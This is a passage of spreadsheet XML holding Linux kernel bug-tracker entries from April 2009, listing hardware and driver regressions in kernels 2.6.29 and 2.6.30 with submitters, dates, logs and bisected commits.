    <t>Subject : 2.6.29-git12 : lockdep warning Submitter : Sachin Sant &lt;sachinp@in.ibm.com&gt; Date : 2009-04-05 12:37 References : http://marc.info/?l=linux-kernel&amp;m=123893439229272&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>forcedeth seems to switch off eth on shutdown</t>
  </si>
  <si>
    <t>2009-04-12 07:00 UTC</t>
  </si>
  <si>
    <t>Daniel Bierstedt</t>
  </si>
  <si>
    <t>2009-06-10 20:06 UTC</t>
  </si>
  <si>
    <t>Hello, I've built a vanilla 2.6.29.1 on a Debian Lenny (stable) system. After recognizing that I will not get lirc working on 2.6.29, I wanted to switch back to 2.6.28.9. But on any other kernel than 2.6.29.1, the network interface is down (no led's no link). Ifconfig on 2.6.28.9 is reporting "no link" for eth0, so the driver seems to be loaded fine... The forcedeth from 2.6.29.1 seems to "shut down" the interface on shutdown, so no other kernel can use it.</t>
  </si>
  <si>
    <t>Fn + brightness up/down keys doesn't work if ACPI enabled - Samsung NC20</t>
  </si>
  <si>
    <t>2.6.28-11</t>
  </si>
  <si>
    <t>2009-04-12 23:34 UTC</t>
  </si>
  <si>
    <t>Barry Carroll</t>
  </si>
  <si>
    <t>2009-09-05 05:22 UTC</t>
  </si>
  <si>
    <t>Created attachment 20950 [details] dmesg output This bug is similar to most new samsung laptops including the NC10 which is addressed in bug 12021 http://bugzilla.kernel.org/show_bug.cgi?id=12021 I have created a bug report downstream in the Ubuntu bug tracker: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/360247 Distribution: Ubuntu Jaunty Beta Kernel: 2.6.28-11 Steps to reproduce: =================== Press fn key plus up arrow to increase brightness, press fn key plus down arrow to decrease brightness Expected results ================ Screen brightness is increased or decreased Actual results ============== fn plus down arrow reduces brightness to minimum. fn plus up arrow increases brightness to maximum. Gnome interface becomes unusable: menus cannot be clicked, keyboard becomes unresponsive Comments ======== The behaviour observed is because the key release events after brightness up and brightness down are not generated. This has the effect of repeating the brightness up or brightness down keys indefinitely. This causes the "all or nothing" effect on brightness and the unresponsive Gnome GUI.</t>
  </si>
  <si>
    <t>Attansic/Atheros Gigabit LAN driver atl1 does not reinitialize on wakeup from S4</t>
  </si>
  <si>
    <t>2.6.27.21-0.1-default</t>
  </si>
  <si>
    <t>2009-04-13 12:00 UTC</t>
  </si>
  <si>
    <t>Ruediger</t>
  </si>
  <si>
    <t>2012-05-30 16:11 UTC</t>
  </si>
  <si>
    <t>The atl1 driver does not initialize the network chip when waking up from S4, which leads to problems on my system's configuration: Problem 1: The Mainboard BIOS (Asus P5K) initializes the network card with 10 MBps, so the card does not operate with full speed. I have to manually change configuration with 'ethtool -s eth0 autoneg on'. Problem 2: I have a parallel Vista installation on this machine. If Vista hibernates, it seems to completely disable the network chip. When I suspend my Linux from S4 in the next step, the network does not work at all and reports 'No carrier'. In this case I have to unload and reload the atl1 module to get it working again. Doing a normal boot initializes the card correctly. modinfo atl1: filename: /lib/modules/2.6.27.21-0.1-default/kernel/drivers/net/atlx/atl1.ko description: Atheros L1 Gigabit Ethernet Driver version: 2.1.3 license: GPL author: Xiong Huang &lt;xiong.huang@atheros.com&gt;, Chris Snook &lt;csnook@redhat.com&gt;, Jay Cliburn &lt;jcliburn@gmail.com&gt; srcversion: 0D5D3EDA68AA2E9B001F0BE alias: pci:v00001969d00001048sv*sd*bc*sc*i* depends: mii supported: yes vermagic: 2.6.27.21-0.1-default SMP mod_unload modversions parm: int_mod_timer:Interrupt moderator timer (array of int) parm: debug:Message level (0=none,...,16=all) (int) Dmesg output for atl1 boot - S4 - wakeup: atl1 0000:02:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 atl1 0000:02:00.0: setting latency timer to 64 atl1 0000:02:00.0: version 2.1.3 atl1 0000:02:00.0: eth0 link is up 100 Mbps full duplex atl1 0000:02:00.0: PCI INT A disabled atl1 0000:02:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 atl1 0000:02:00.0: setting latency timer to 64 atl1 0000:02:00.0: eth0 link is up 10 Mbps half duplex</t>
  </si>
  <si>
    <t>hpet=force boot hang due to commit ff69f2bba67bd45514923aaedbf40fe351787c59</t>
  </si>
  <si>
    <t>2009-04-14 17:51 UTC</t>
  </si>
  <si>
    <t>2009-05-07 09:05 UTC</t>
  </si>
  <si>
    <t>Created attachment 20976 [details] Hanging boot log (at commit b21597d0268983f8f9e8b563494f75490403e948) I bisected a boot-hang on Acer TravelMate 66x laptop and ended on commit ff69f2bba67bd45514923aaedbf40fe351787c59. My system is: Acer TravelMate 66x 00:00.0 Host bridge [0600]: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller [8086:3580] (rev 02) 00:00.1 System peripheral [0880]: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller [8086:3584] (rev 02) 00:00.3 System peripheral [0880]: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller [8086:3585] (rev 02) 00:02.0 VGA compatible controller [0300]: Intel Corporation 82852/855GM Integrated Graphics Device [8086:3582] (rev 02) 00:02.1 Display controller [0380]: Intel Corporation 82852/855GM Integrated Graphics Device [8086:3582] (rev 02) 00:1d.0 USB Controller [0c03]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 [8086:24c2] (rev 03) 00:1d.1 USB Controller [0c03]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 [8086:24c4] (rev 03) 00:1d.2 USB Controller [0c03]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 [8086:24c7] (rev 03) 00:1d.7 USB Controller [0c03]: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller [8086:24cd] (rev 03) 00:1e.0 PCI bridge [0604]: Intel Corporation 82801 Mobile PCI Bridge [8086:2448] (rev 83) 00:1f.0 ISA bridge [0601]: Intel Corporation 82801DBM (ICH4-M) LPC Interface Bridge [8086:24cc] (rev 03) 00:1f.1 IDE interface [0101]: Intel Corporation 82801DBM (ICH4-M) IDE Controller [8086:24ca] (rev 03) 00:1f.3 SMBus [0c05]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller [8086:24c3] (rev 03) 00:1f.5 Multimedia audio controller [0401]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller [8086:24c5] (rev 03) 00:1f.6 Modem [0703]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller [8086:24c6] (rev 03) 02:02.0 Ethernet controller [0200]: Broadcom Corporation BCM4401 100Base-T [14e4:4401] (rev 01) 02:04.0 Network controller [0280]: Intel Corporation PRO/Wireless LAN 2100 3B Mini PCI Adapter [8086:1043] (rev 04) 02:06.0 CardBus bridge [0607]: O2 Micro, Inc. OZ711EC1 SmartCardBus Controller [1217:7113] (rev 20) 02:06.1 CardBus bridge [0607]: O2 Micro, Inc. OZ711EC1 SmartCardBus Controller [1217:7113] (rev 20) 02:07.0 FireWire (IEEE 1394) [0c00]: Texas Instruments TSB43AB21 IEEE-1394a-2000 Controller (PHY/Link) [104c:8026] Attached is boot log captures with netconsole. When hang the bisk light remains on.</t>
  </si>
  <si>
    <t>ath5k resume regression with AR2413</t>
  </si>
  <si>
    <t>2009-04-15 21:14 UTC</t>
  </si>
  <si>
    <t>Florian</t>
  </si>
  <si>
    <t>2010-05-03 23:58 UTC</t>
  </si>
  <si>
    <t>Created attachment 21001 [details] annotated kern.log my wireless is an Atheros AR2413 on a pccard by tp-link (TL-WN510G). It suspends/resumes flawlessly on the 2.6.28.9 kernel, yet on 2.6.29 while the wireless is ok after the initial boot, resume fails with ath5k phy0: failed to wakeup the MAC Chip ath5k 0000:02:00.0: PCI INT A disabled ath5k: probe of 0000:02:00.0 failed with error -5 doing 'modprobe -r ath5k; modprobe ath5k' just repeats these messages; yet when I manually remove and reinject the pccard, everything's fine again. I'm attaching an annotated kern.log of a 2.6.29 boot/suspend/resume/module reinsertion/pccard reinsertion, followed by 2.6.28 boot/suspend/successful resume. Please tell me where to go from here, what other info might be useful etc. I'm happy to try patches or specific git checkouts, but am a bit at a loss what way to start. Florian</t>
  </si>
  <si>
    <t>2.6.30-rc2 hangs in get_measured_perf on tigerton</t>
  </si>
  <si>
    <t>2.6.30-rc2</t>
  </si>
  <si>
    <t>2009-04-15 22:17 UTC</t>
  </si>
  <si>
    <t>2009-04-25 21:03 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc2 hangs in get_measured_perf on tigerton Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2009-04-15 14:01 References : http://lkml.org/lkml/2009/4/15/34 Handled-By : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt; Patch : http://lkml.org/lkml/2009/4/15/355 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel will freeze network after using a tun/tap device</t>
  </si>
  <si>
    <t>2009-04-15 22:19 UTC</t>
  </si>
  <si>
    <t>Dâniel Fraga</t>
  </si>
  <si>
    <t>2009-06-18 18:25 UTC</t>
  </si>
  <si>
    <t>I choose the forcedeth driver to report this bug because I think it's related to forcedeth and not tun/tap driver, although I can be wrong. With 2.6.29 kernel everything works fine, but with 2.6.30-rc2, a simple ping to a tun/tap device (for example ping to a vpn using openvpn) will freeze the network. In X I can't even use the keyboard anymore. It just happens with a tun/tap device, not with a normal ethernet device or a normal internet connection. If you think it's a tun/tap driver problem, please change the bug, but as I'm not completely sure, I choose forcedeth. Thanks. Ps: I couldn't test with 2.6.30-rc1 because it won't let me use the network at all. 2.6.30-rc2 fixes the network but it has this tun/tap problem.</t>
  </si>
  <si>
    <t>2.6.29-git12 breaks vga=0x0f07 on MSI/Intel GPU</t>
  </si>
  <si>
    <t>P4 normal</t>
  </si>
  <si>
    <t>2009-04-15 22:26 UTC</t>
  </si>
  <si>
    <t>2009-04-17 21:11 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-git12 breaks vga=0x0f07 on MSI/Intel GPU Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2009-04-06 01:14 References : http://lkml.org/lkml/2009/4/5/200 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>net, sky2: BUG: unable to handle kernel NULL pointer dereference, pci_vpd_truncate()</t>
  </si>
  <si>
    <t>commit 3834507d0c5480a0f05486c2fb57ed18fd179a83</t>
  </si>
  <si>
    <t>2009-04-15 22:31 UTC</t>
  </si>
  <si>
    <t>2009-04-17 21:14 UTC</t>
  </si>
  <si>
    <t>Subject : net, sky2: BUG: unable to handle kernel NULL pointer dereference, pci_vpd_truncate() Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2009-04-06 9:03 References : http://marc.info/?l=linux-kernel&amp;m=123900867611321&amp;w=4 Handled-By : Stephen Hemminger &lt;shemminger@vyatta.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>can't anymore even do a s2ram-s2disk-s2ram cycle on acer aspire 5720G</t>
  </si>
  <si>
    <t>commit a0d4922da2e4ccb0973095d8d29f36f6b1b5f703</t>
  </si>
  <si>
    <t>2009-04-15 22:43 UTC</t>
  </si>
  <si>
    <t>2011-07-30 05:56 UTC</t>
  </si>
  <si>
    <t>Subject : [BISECTED] [REGRESSION] can't anymore even do a s2ram-s2disk-s2ram cycle on acer aspire 5720G Submitter : Maxim Levitsky &lt;maximlevitsky@gmail.com&gt; Date : 2009-04-06 23:52 References : http://marc.info/?l=linux-kernel&amp;m=123906202829074&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Reportedly caused by: commit a0d4922da2e4ccb0973095d8d29f36f6b1b5f703 Author: Alan Stern &lt;stern@rowland.harvard.edu&gt; Date: Wed Dec 17 15:06:03 2008 -0500 USB: fix up suspend and resume for PCI host controllers Signed-off-by: Alan Stern &lt;stern@rowland.harvard.edu&gt; CC: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; First-Bad-Commit : a0d4922da2e4ccb0973095d8d29f36f6b1b5f703</t>
  </si>
  <si>
    <t>BUG: scheduling while atomic: swapper/0/0x10000100</t>
  </si>
  <si>
    <t>2009-04-15 22:53 UTC</t>
  </si>
  <si>
    <t>2009-05-16 20:59 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.29-git12] BUG: scheduling while atomic: swapper/0/0x10000100 Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2009-04-07 7:37 References : http://marc.info/?l=linux-kernel&amp;m=123908995822195&amp;w=4 Notify-Also : Thomas Gleixner &lt;tglx@linutronix.de&gt; Notify-Also : Marcel Holtmann &lt;marcel@holtmann.org&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.30-rc1: intel 3945 no wireless</t>
  </si>
  <si>
    <t>2009-04-16 21:16 UTC</t>
  </si>
  <si>
    <t>2009-04-17 21:16 UTC</t>
  </si>
  <si>
    <t>Subject : Justin Madru &lt;jdm64@gawab.com&gt; Submitter : 2.6.30-rc1: intel 3945 no wireless Date : 2009-04-08 5:36 References : http://marc.info/?l=linux-kernel&amp;m=123916905605534&amp;w=4 Notify-Also : Larry Finger &lt;Larry.Finger@lwfinger.net&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.30-rc1: white screen during boot (regression) on spitz</t>
  </si>
  <si>
    <t>2009-04-16 21:37 UTC</t>
  </si>
  <si>
    <t>2009-04-26 12:18 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc1: white screen during boot (regression) on spitz Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2009-04-10 10:34 References : http://marc.info/?l=linux-kernel&amp;m=123935954223418&amp;w=4 Handled-By : "Dmitry Eremin-Solenikov" &lt;dbaryshkov@gmail.com&gt; Notify-Also : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.30-rc1 problems with firmware loading</t>
  </si>
  <si>
    <t>2009-04-16 21:44 UTC</t>
  </si>
  <si>
    <t>2009-04-18 12:14 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc1 problems with firmware loading Submitter : "Ben Castricum" &lt;mail0904@bencastricum.nl&gt; Date : 2009-04-12 6:20 References : http://marc.info/?l=linux-kernel&amp;m=123951774919978&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux 2.6.30-rc1 tg3 endian issues with MAC addresses on BCM5701</t>
  </si>
  <si>
    <t>2009-04-16 21:49 UTC</t>
  </si>
  <si>
    <t>2009-04-26 12:06 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.30-rc1 tg3 endian issues with MAC addresses on BCM5701. Bisected. Submitter : Robin Holt &lt;holt@sgi.com&gt; Date : 2009-04-08 7:12 References : http://marc.info/?l=linux-kernel&amp;m=123917477312823&amp;w=4 Handled-By : "Matt Carlson" &lt;mcarlson@broadcom.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit e4f341103e4a2b35f56a0f89802f1b1448e8d04b Author: Matt Carlson &lt;mcarlson@broadcom.com&gt; Date: Wed Feb 25 14:25:00 2009 +0000 tg3: Invert nvram_read() and nvram_read_swab() Signed-off-by: Matt Carlson &lt;mcarlson@broadcom.com&gt; Signed-off-by: Benjamin Li &lt;benli@broadcom.com&gt; Signed-off-by: Michael Chan &lt;mchan@broadcom.com&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; First-Bad-Commit : e4f341103e4a2b35f56a0f89802f1b1448e8d04b</t>
  </si>
  <si>
    <t>Oops in drain_array</t>
  </si>
  <si>
    <t>2009-04-16 22:44 UTC</t>
  </si>
  <si>
    <t>2009-05-16 22:39 UTC</t>
  </si>
  <si>
    <t>Subject : Oops 2.6.29.1 Submitter : Bart &lt;mmx@riz.pl&gt; Date : 2009-04-14 10:21 References : http://marc.info/?l=linux-kernel&amp;m=123970493224628&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>USB storage (usbstick) automount woes</t>
  </si>
  <si>
    <t>2.6.30-git</t>
  </si>
  <si>
    <t>2009-04-16 22:59 UTC</t>
  </si>
  <si>
    <t>2009-04-26 23:14 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30.git: USB storage (usbstick) automount woes - bisected Submitter : Mike Galbraith &lt;efault@gmx.de&gt; Date : 2009-04-09 9:26 References : http://marc.info/?l=linux-kernel&amp;m=123926928907568&amp;w=4 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit e6e244b6cb1f70e7109381626293cd40a8334ed3 Author: Alan Stern &lt;stern@rowland.harvard.edu&gt; Date: Thu Feb 12 14:47:44 2009 -0500 usb-storage: prepare for subdriver separation Signed-off-by: Alan Stern &lt;stern@rowland.harvard.edu&gt; CC: Matthew Dharm &lt;mdharm-usb@one-eyed-alien.net&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; First-Bad-Commit : e6e244b6cb1f70e7109381626293cd40a8334ed3</t>
  </si>
  <si>
    <t>microcode driver newly spews warnings</t>
  </si>
  <si>
    <t>2.6.30-rc1-00306-g8371f87</t>
  </si>
  <si>
    <t>2009-04-16 23:05 UTC</t>
  </si>
  <si>
    <t>2009-04-25 21:01 UTC</t>
  </si>
  <si>
    <t>Subject : microcode driver newly spews warnings Submitter : Jeff Garzik &lt;jeff@garzik.org&gt; Date : 2009-04-13 18:23 References : http://marc.info/?l=linux-kernel&amp;m=123964711725007&amp;w=4 Handled-By : Dmitry Adamushko &lt;dmitry.adamushko@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123980715900884&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Can't boot with nosmp</t>
  </si>
  <si>
    <t>2009-04-16 23:12 UTC</t>
  </si>
  <si>
    <t>2009-06-09 23:18 UTC</t>
  </si>
  <si>
    <t>Subject : Can't boot with "nosmp" Submitter : Stephen Hemminger &lt;shemminger@vyatta.com&gt; Date : 2009-04-15 4:18 References : http://marc.info/?l=linux-kernel&amp;m=123976917817920&amp;w=4 Handled-By : Dan Williams &lt;dan.j.williams@intel.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>RCU detected CPU 1 stall</t>
  </si>
  <si>
    <t>2009-04-16 23:19 UTC</t>
  </si>
  <si>
    <t>2009-04-17 00:23 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.30-rc1] RCU detected CPU 1 stall Submitter : Tetsuo Handa &lt;penguin-kernel@i-love.sakura.ne.jp&gt; Date : 2009-04-08 0:57 References : http://marc.info/?l=linux-kernel&amp;m=123915230221889&amp;w=4 Handled-By : Hugh Dickins &lt;hugh@veritas.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit f520360d93cdc37de5d972dac4bf3bdef6a7f6a7 Author: Arjan van de Ven &lt;arjan@linux.intel.com&gt; Date: Thu Mar 19 09:09:05 2009 -0700 kobject: don't block for each kobject_uevent Signed-off-by: Arjan van de Ven &lt;arjan@linux.intel.com&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; First-Bad-Commit : f520360d93cdc37de5d972dac4bf3bdef6a7f6a7</t>
  </si>
  <si>
    <t>iptables very slow after commit 784544739a25c30637397ace5489eeb6e15d7d49</t>
  </si>
  <si>
    <t>commit 784544739a25c30637397ace5489eeb6e15d7d49</t>
  </si>
  <si>
    <t>2009-04-16 23:28 UTC</t>
  </si>
  <si>
    <t>2009-05-17 10:25 UTC</t>
  </si>
  <si>
    <t>Subject : iptables very slow after commit 784544739a25c30637397ace5489eeb6e15d7d49 Submitter : Jeff Chua &lt;jeff.chua.linux@gmail.com&gt; Date : 2009-04-10 16:05 References : http://lkml.org/lkml/2009/4/10/111 Handled-By : Eric Dumazet &lt;dada1@cosmosbay.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit 784544739a25c30637397ace5489eeb6e15d7d49 Author: Stephen Hemminger &lt;shemminger@vyatta.com&gt; Date: Fri Feb 20 10:35:32 2009 +0100 netfilter: iptables: lock free counters Acked-by: Eric Dumazet &lt;dada1@cosmosbay.com&gt; Signed-off-by: Patrick McHardy &lt;kaber@trash.net&gt;</t>
  </si>
  <si>
    <t>Trouble with make-install from a NFS mount</t>
  </si>
  <si>
    <t>2009-04-16 23:34 UTC</t>
  </si>
  <si>
    <t>2009-07-07 19:56 UTC</t>
  </si>
  <si>
    <t>Subject : Trouble with make-install from a NFS mount Submitter : Gregory Haskins &lt;ghaskins@novell.com&gt; Date : 2009-04-14 21:32 References : http://marc.info/?l=linux-kernel&amp;m=123974482327044&amp;w=4 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; Notify-Also : Sam Ravnborg &lt;sam@ravnborg.org&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: using rootfstype=ext4 causes oops</t>
  </si>
  <si>
    <t>2009-04-16 23:39 UTC</t>
  </si>
  <si>
    <t>2009-04-25 20:59 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: using rootfstype=ext4 causes oops Submitter : Andrew Price &lt;andy@andrewprice.me.uk&gt; Date : 2009-04-15 20:59 References : http://marc.info/?l=linux-kernel&amp;m=123982932807371&amp;w=4 Handled-By : Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123989762527684&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Buggy _BCM - acer aspire 5720G, 5710Z, 5315</t>
  </si>
  <si>
    <t>commit 1a7c618a3f7bef1a20ae740df512eeba21397fa5</t>
  </si>
  <si>
    <t>2009-04-16 23:45 UTC</t>
  </si>
  <si>
    <t>2009-09-17 16:25 UTC</t>
  </si>
  <si>
    <t>Subject : [BISECTED] [REGRESSION] "ACPI video: support _BQC/_BCL/_BCM methods that use index values" breaks ACPI video Submitter : Maxim Levitsky &lt;maximlevitsky@gmail.com&gt; Date : 2009-04-16 11:37 References : http://marc.info/?l=linux-kernel&amp;m=123988189401913&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit 1a7c618a3f7bef1a20ae740df512eeba21397fa5 Author: Zhang Rui &lt;rui.zhang@intel.com&gt; Date: Wed Mar 18 16:27:16 2009 +0800 ACPI video: support _BQC/_BCL/_BCM methods that use index values Signed-off-by: Zhang Rui &lt;rui.zhang@intel.com&gt; Acked-by: Matthew Garrett &lt;mjg59@srcf.ucam.org&gt; Acked-by: Thomas Renninger &lt;trenn@suse.de&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; First-Bad-Commit : 1a7c618a3f7bef1a20ae740df512eeba21397fa5</t>
  </si>
  <si>
    <t>reiserfs_delete_xattrs: Couldn't delete all xattrs (-13)</t>
  </si>
  <si>
    <t>2009-04-16 23:47 UTC</t>
  </si>
  <si>
    <t>2009-05-18 20:23 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc2: reiserfs_delete_xattrs: Couldn't delete all xattrs (-13) Submitter : Alexander Beregalov &lt;a.beregalov@gmail.com&gt; Date : 2009-04-16 19:23 References : http://marc.info/?l=linux-kernel&amp;m=123990989515105&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>20 ACPI interrupts per second on EEEPC 4G</t>
  </si>
  <si>
    <t>commit b1569e99c795bf83b4ddf41c4f1c42761ab7f75e</t>
  </si>
  <si>
    <t>2009-04-16 23:59 UTC</t>
  </si>
  <si>
    <t>2009-04-25 20:56 UTC</t>
  </si>
  <si>
    <t>Subject : Regression: 20 ACPI interrupts per second on EEEPC 4G Submitter : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; Date : 2009-04-12 15:54 References : http://marc.info/?l=linux-kernel&amp;m=123955169317870&amp;w=4 Handled-By : Matthew Garrett &lt;mjg59@srcf.ucam.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123973665713690&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ioatdma: DMA-API: device driver frees DMA memory with wrong function</t>
  </si>
  <si>
    <t>2009-04-17 00:03 UTC</t>
  </si>
  <si>
    <t>2009-05-16 21:54 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc1: ioatdma: DMA-API: device driver frees DMA memory with wrong function Submitter : Alexander Beregalov &lt;a.beregalov@gmail.com&gt; Date : 2009-04-09 12:36 References : http://marc.info/?l=linux-kernel&amp;m=123928064322503&amp;w=4 Handled-By : Dan Williams &lt;dan.j.williams@intel.com&gt; This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>active uvcvideo breaks over suspend</t>
  </si>
  <si>
    <t>2009-04-17 00:10 UTC</t>
  </si>
  <si>
    <t>2009-05-25 23:17 UTC</t>
  </si>
  <si>
    <t>Subject : Regression: active uvcvideo breaks over suspend Submitter : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; Date : 2009-04-15 10:12 References : http://marc.info/?l=linux-kernel&amp;m=123979009508840&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: MAX_LOCKDEP_ENTRIES too low! when mounting rootfs</t>
  </si>
  <si>
    <t>2.6.30-rc6</t>
  </si>
  <si>
    <t>2009-04-17 00:12 UTC</t>
  </si>
  <si>
    <t>2009-05-25 23:18 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.30-rc2: BUG: MAX_LOCKDEP_ENTRIES too low! when mounting rootfs Submitter : Alexander Beregalov &lt;a.beregalov@gmail.com&gt; Date : 2009-04-15 12:43 References : http://marc.info/?l=linux-kernel&amp;m=123979949820538&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>FM tuner works but `ivtv-radio` cannot find any active radio channels on GotView PCI DVD Lite card</t>
  </si>
  <si>
    <t>GIT</t>
  </si>
  <si>
    <t>2009-04-17 22:08 UTC</t>
  </si>
  <si>
    <t>2012-05-30 16:17 UTC</t>
  </si>
  <si>
    <t>ivtv-radio cannot find any active radio channels: ./ivtv-radio -vv -s 87.00, 1392: 0 87.06, 1393: 0 87.12, 1394: 0 87.19, 1395: 0 ... 107.81, 1725: 0 107.88, 1726: 0 107.94, 1727: 0 Hardware in question: 01:07.0 Multimedia video controller: Internext Compression Inc iTVC16 (CX23416) MPEG-2 Encoder (rev 01) Subsystem: Device ffad:0600 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (32000ns min, 2000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 17 Region 0: Memory at d8000000 (32-bit, prefetchable) [size=64M] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ivtv Kernel modules: ivtv Apr 18 04:02:22 localhost kernel: ivtv: Start initialization, version 1.4.1 Apr 18 04:02:22 localhost kernel: ivtv 0000:01:07.0: Non-NULL drvdata on register Apr 18 04:02:22 localhost kernel: ivtv0: Initializing card 0 Apr 18 04:02:22 localhost kernel: ivtv0: Autodetected Yuan PG600-2, GotView PCI DVD Lite card (cx23416 based) Apr 18 04:02:22 localhost kernel: ivtv0: info: base addr: 0xd8000000 Apr 18 04:02:22 localhost kernel: ivtv0: info: Enabling pci device Apr 18 04:02:22 localhost kernel: ivtv 0000:01:07.0: PCI INT A -&gt; Link[APC2] -&gt; GSI 17 (level, low) -&gt; IRQ 17 Apr 18 04:02:22 localhost kernel: ivtv0: info: Attempting to enable Bus Mastering Apr 18 04:02:22 localhost kernel: ivtv0: info: Bus Mastering Enabled. Apr 18 04:02:22 localhost kernel: ivtv0: info: 22 (rev 1) at 01:07.0, irq: 17, latency: 64, memory: 0xd8000000 Apr 18 04:02:22 